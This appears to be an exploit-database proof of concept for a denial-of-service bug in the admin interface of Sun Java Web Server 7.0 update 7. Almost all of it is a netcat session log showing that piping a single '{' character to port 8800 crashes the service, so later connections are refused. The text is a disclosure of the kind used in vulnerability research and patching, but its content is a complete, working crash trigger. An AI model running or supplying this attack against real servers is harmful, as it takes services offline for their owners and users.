`# Sun Java Web Sever 7.0 u7 Admin Interface DOS
# Software Package sjsws-7_0u7-windows-i586.zip 4fb8d1fb700d5649234a2891a4ecedea
# While attempting to verify http://www.exploit-db.com/exploits/14194/ (which was not verified),
# I stumbled across semi amusing DOS:
root@bt:~# nc -nv 192.168.48.134 8800
(UNKNOWN) [192.168.48.134] 8800 (?) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 06 Jul 2010 00:22:50 GMT
Content-type: text/html
Last-modified: Tue, 06 Jul 2010 00:18:00 GMT
Content-length: 465
Etag: "1d1-4c327638"
Accept-ranges: bytes
Connection: close
root@bt:~# echo { |nc -nv 192.168.48.134 8800
(UNKNOWN) [192.168.48.134] 8800 (?) open
root@bt:~# echo { |nc -nv 192.168.48.134 8800
(UNKNOWN) [192.168.48.134] 8800 (?) : Connection refused
root@bt:~#
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